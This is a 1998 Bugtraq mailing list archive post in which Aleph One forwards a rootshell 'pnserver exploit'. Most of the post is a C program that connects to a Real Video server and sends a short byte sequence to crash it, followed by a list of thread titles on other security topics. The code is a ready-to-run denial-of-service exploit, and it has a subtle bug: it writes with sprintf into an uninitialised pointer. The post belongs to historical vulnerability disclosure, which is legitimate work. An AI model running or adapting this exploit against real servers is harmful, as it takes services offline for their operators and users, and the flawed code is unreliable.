Bugtraq mailing list archives
pnserver exploit..
From: aleph1 () DFW DFW NET (Aleph One)
Date: Thu, 15 Jan 1998 21:22:43 -0600
Courtesy of the fine folks at rootshell. -- forward -- It seems that the pnserver bug was different than first thought. The telnet client sends 6 characters that crash the server when its own maxbuffer is reached. Here is a working exploit. /* * pnserver exploit [1/15/98] * * Crash's Progressive Networks Real Video Server [ http://www.real.com/ ] * * [ http://www.rootshell.com/ ] * * Compiled under linux. * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdlib.h> #include <unistd.h> void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock; if (argc != 3) { printf("usage: %s <rvserver_host> <port>\n\nNote: Try port 7070.\n\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(atoi(argv[2])); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6); write(sock, &buffer[0], strlen(buffer)); close(sock); }
Current thread:
- Re: DoS attack: apache (& other) .htaccess Authentication, (continued)
- Re: DoS attack: apache (& other) .htaccess Authentication Casper Dik (Jan 16)
- pbomb'ing SSH on a FreeBSD box. Jeff Johnson (Jan 15)
- Re: pbomb'ing SSH on a FreeBSD box. FrontLine Assembly (Jan 17)
- Re: DoS attack: apache (& other) .htaccess Authentication Dean Gaudet (Jan 16)
- Re: GCC 2.7.? /tmp files dichro-bugtraq () RCPT TO (Jan 17)
- Re: GCC 2.7.? /tmp files Zack Weinberg (Jan 18)
- Re: GCC 2.7.? /tmp files John Gotts (Jan 19)
- CERT Vendor-Initiated Bulletin VB-98.01 - excite Aleph One (Jan 19)
- GCC 2.7.? /tmp files Micha? Zalewski (Jan 15)
- Re: GCC 2.7.? /tmp files Niels Bakker (Jan 16)
- pnserver exploit.. Aleph One (Jan 15)
- Re: pnserver exploit.. Angelos Karageorgiou (Jan 16)
- Re: pnserver exploit.. Donald van de Weyer (Jan 21)
- (AUSCERT ESB-98.009) CERT Advisory CA-98.02 - Vulnerabilities in Grant Beattie (Jan 21)
- Q179148: Settings May Not Be Applied with URL with Short Filename Aleph One (Jan 23)
- CDE: dtappgather on AIX Marcin Cieslak (Jan 25)
- Simple OpenBSD crash script Jason Downs (Jan 25)
- Re: Simple OpenBSD crash script GvS One (Jan 28)
- Quake 2 Linux kevingeo () CRUZIO COM (Jan 25)
- Re: Quake 2 Linux Greg Alexander (Jan 27)
- Announcement: Phrack 52 route () RESENTMENT INFONEXUS COM (Jan 26)